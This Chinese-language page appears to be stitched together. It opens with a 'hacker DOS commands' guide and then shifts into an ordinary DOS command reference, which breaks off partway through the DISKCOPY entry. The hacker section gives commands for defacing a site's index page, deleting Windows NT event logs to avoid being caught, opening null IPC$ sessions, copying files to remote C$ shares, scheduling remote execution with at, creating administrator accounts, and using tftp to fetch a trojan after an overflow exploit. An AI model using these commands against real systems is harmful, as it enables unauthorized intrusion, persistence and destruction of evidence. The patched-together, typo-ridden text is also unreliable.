这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。

attrib -r index.htm

这个命令是把index.htm的只读属性去掉。

如果把“-”改为“+”则是把这个文件的属性设置为只读

----------------------

attrib +r index.htm

这个命令是把index.htm的属性设置为只读。

12:del

当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。

NT的日志有这些

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他盘。

黑客常用dos命令2
建立一个空连接
命令：net use \\192.168.0.198\ipc$ "" /user:"administrator"

查看远程主机的共享资源
命令：net view \\ip

查看远程主机的当前时间
命令： net time \\ip

得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）
命令：nbtstat -A ip

删除连接:
net use \\127.0.0.1\ipc$ /del

映射/删除远程共享:
net use z: \\127.0.0.1\c

向远程主机复制文件:
路径\文件名 \\IP\共享目录名，如：
d:\3389.exe \\IP\c$ 即将d盘下的3389.exe复制到对方c盘内

把远程主机上的文件复制到自己的机器里：
\\127.0.0.1\c$\xinxin.exe c:\

远程添加计划任务:
at \\IP 时间 程序名 如：
at \\IP 11:00 3389.exe

1）查看本地主机的共享资源（可以看到本地的默认共享）
net share

2）得到本地主机的用户列表
net user

3）显示本地某用户的帐户信息
net user 帐户名

4）显示本地主机当前启动的服务
net start

5）启动/关闭本地服务
net start 服务名
net stop 服务名

6）在本地添加帐户
net user 帐户名 密码 /add

7）激活禁用的用户
net uesr 帐户名 /active:yes

8）加入管理员组
net localgroup administrators xuliguo /add

tftp -i 你的IP get **.exe c:\winnt\system32\**.exe

m溢出的对方SHELL后在DOS下上传木马
tftp -i 自已的IP get ***.exe
time
at \\对方的IP 时间 ***.exe

DOS命令大全
一）MD——建立子目录
1．功能：创建新的子目录
2．类型：内部命令
3．格式：MD[盘符：][路径名]〈子目录名〉
4．使用说明：
（1）“盘符”：指定要建立子目录的磁盘驱动器字母，若省略，则为当前驱动器；
（2）“路径名”：要建立的子目录的上级目录名，若缺省则建在当前目录下。
例：（1）在C盘的根目录下创建名为FOX的子目录；（2）在FOX子目录下再创建USER子目录。
C：、＞MD FOX （在当前驱动器C盘下创建子目录FOX）
C：、＞MD FOX 、USER （在FOX 子目录下再创建USER子目录）
（二）CD——改变当前目录
1．功能：显示当前目录
2．类型：内部命令
3．格式：CD[盘符：][路径名][子目录名]
4．使用说明：
（1）如果省略路径和子目录名则显示当前目录；
（2）如采用“CD、”格式，则退回到根目录；
（3）如采用“CD.。”格式则退回到上一级目录。
例：（1）进入到USER子目录；（2）从USER子目录退回到子目录；（3）返回到根目录。
C:、＞CD FOX 、USER（进入FOX子目录下的USER子目录）
C:、FOX、USER＞CD.。 （退回上一级根目录）
C：、FOX＞CD、 （返回到根目录）
C：、＞
（三）RD——删除子目录命令
1．功能：从指定的磁盘删除了目录。
2．类型：内部命令
3．格式：RD[盘符：][路径名][子目录名]
4．使用说明：
（1）子目录在删除前必须是空的，也就是说需要先进入该子目录，使用DEL（删除文件的命令）将其子目录下的文件删空，然后再退回到上一级目录，用RD命令删除该了目录本身；
（2）不能删除根目录和当前目录。
例：要求把C盘FOX子目录下的USER子目录删除，操作如下：
第一步：先将USER子目录下的文件删空；
C、＞DEL C：、FOX、USER、*。*
第二步，删除USER子目录。
C、＞RD C：、FOX、USER
（四）DIR——显示磁盘目录命令
1．功能：显示磁盘目录的内容。
2．类型：内部命令
3．格式：DIR [盘符][路径][/P][/W]
4．
使用说明：/P的使用；当欲查看的目录太多，无法在一屏显示完屏幕会一直往上卷，不容易看清，加上/P参数后，屏幕上会分面一次显示23行的文件信息，然后暂停，并提示；Press
any key to continue
/W的使用：加上/W只显示文件名，至于文件大小及建立的日期和时间则都省略。加上参数后，每行可以显示五个文件名。
PATH——路径设置命令
1．功能：设备可执行文件的搜索路径，只对文件有效。
2．类型：内部命令
3．格式：PATH[盘符1]目录[路径名1]{[；盘符2：]，〈目录路径名2〉…}
4．使用说明：
（1）当运行一个可执行文件时，DOS会先在当前目录中搜索该文件，若找到则运行之；若找不到该文件，则根据PATH命令所设置的路径，顺序逐条地到目录中搜索该文件；
（2）PATH命令中的路径，若有两条以上，各路径之间以一个分号“；”隔开；
（3）PATH命令有三种使用方法：
PATH[盘符1：][路径1][盘符2：][路径2]…（设定可执行文件的搜索路径） PATH：（取消所有路径）
PATH：（显示目前所设的路径）
（六）TREE——显示磁盘目录结构命令
1．功能：显示指定驱动器上所有目录路径和这些目录下的所有文件名。
2．类型：外部命令
3．格式：TREE[盘符：][/F][》PRN]
4．使用说明：
（1）使用/F参数时显示所有目录及目录下的所有文件，省略时，只显示目录，不显示目录下的文件；
（2）选用＞PRN参数时，则把所列目录及目录中的文件名打印输出。
（七）DELTREE——删除整个目录命令
1．功能：将整个目录及其下属子目录和文件删除。
2．类型：外部命令
3．格式：DELTREE[盘符：]〈路径名〉
4．使用说明：该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除，而且不管文件的属性为隐藏、系统或只读，只要该文件位于删除的目录之下，DELTREE都一视同仁，照删不误。使用时务必小心！！！
五、磁盘操作类命令
（一）formAT——磁盘格式化命令
1．功能：对磁盘进行格式化，划分磁道和扇区；同时检查出整个磁盘上有无带缺陷的磁道，对坏道加注标记；建立目录区和文件分配表，使磁盘作好接收DOS的准备。
2．类型：外部命令
3．格式：formAT〈盘符：〉[/S][/4][/Q]
4．使用说明：
（1）命令后的盘符不可缺省，若对硬盘进行格式化，则会如下列提示：WARNING:ALL DATA ON NON
——REMOVABLE DISK
DRIVE C:WILL BE LOST ！
Proceed with format (Y/N)？
（警告：所有数据在C盘上，将会丢失，确实要继续格式化吗？）
（2）若是对软盘进行格式化，则会如下提示：Insert mew diskette for drive A;
and press ENTER when ready…
（在A驱中插入新盘，准备好后按回车键）。
（3）选用[/S]参数，将把DOS系统文件IO.SYS
、MSDOS.SYS及COMMAND.COM复制到磁盘上，使该磁盘可以做为DOS启动盘。若不选用/S参数，则格式化后的磙盘只能读写信息，而不能做为启动盘；
（4）选用[/4]参数，在1.2MB的高密度软驱中格式化360KB的低密度盘；
（5）选用[/Q]参数，快速格式化，这个参数并不会重新划分磁盘的磁道貌岸然和扇区，只能将磁盘根目录、文件分配表以及引导扇区清成空白，因此，格式化的速度较快。
（6）选用[/U]参数，表示无条件格式化，即破坏原来磁盘上所有数据。不加/U，则为安全格式化，这时先建立一个镜象文件保存原来的FAT表和根目录，必要时可用UNFORRMAT恢复原来的数据。
（二）UNformAT恢复格式化命令
1．功能：对进行过格式化误操作丢失数据的磁盘进行恢复。
2．类型：外部命令
3．格式：UNformAT〈盘符〉[/L][/U][/P][/TEST]
4．使用说明：用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区（包括FAT、根目录、BOOT扇区及硬盘分区表）受损时，也可以用UNformAT来抢救。
（1）选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息，但不会真的做formAT工作。
（2）选用/P参数将显示于屏幕的报告（包含/L参数所产生的信息）同时也送到打印机。运行时屏幕会显示：“Print out will
be sent to LPT1”
（3）选用/TEST参数只做模拟试验（TEST）不做真正的写入动作。使用此参数屏幕会显示：“Simulation only”
（4）选用/U参数不使用MIRROR映像文件的数据，直接根据磁盘现状进行UNformAT。
（5）选用/PSRTN；修复硬盘分区表。
若在盘符之后加上/P、/L、/TEST之一，都相当于使用了/U参数，UNformAT会“假设”此时磁盘没有MIRROR映像文件。
注意：UNformAT对于刚formAT的磁盘，可以完全恢复，但formAT后若做了其它数据的写入，则UNformAT就不能完整的救回数据了。UNformAT并非是万能的，由于使用UNformAT会重建FAT与根目录，所以它也具有较高的危险性，操作不当可能会扩大损失，如果仅误删了几个文件或子目录，只需要利用UNDELETE就够了。
三） CHKDSK——检查磁盘当前状态命令
1．功能：显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。
2．类型：外部命令
3．格式：CHKDSK [盘符：][路径][文件名][/F][/V]
4．使用说明：
（1）选用[文件名]参数，则显示该文件占用磁盘的情况；
（2）选[/F]参数，纠正在指定磁盘上发现的逻辑错误；
（3）选用[/V]参数，显示盘上的所有文件和路径。
（四）DISKCOPY——整盘复制命令
1．功能：复制格式和内容完全相同的软盘。
2．类型：外部命令
3．格式：DISKCOPY[盘符1：][盘符2：]
4．使用说明：
（1）如果目标软盘没有格式化，则复制时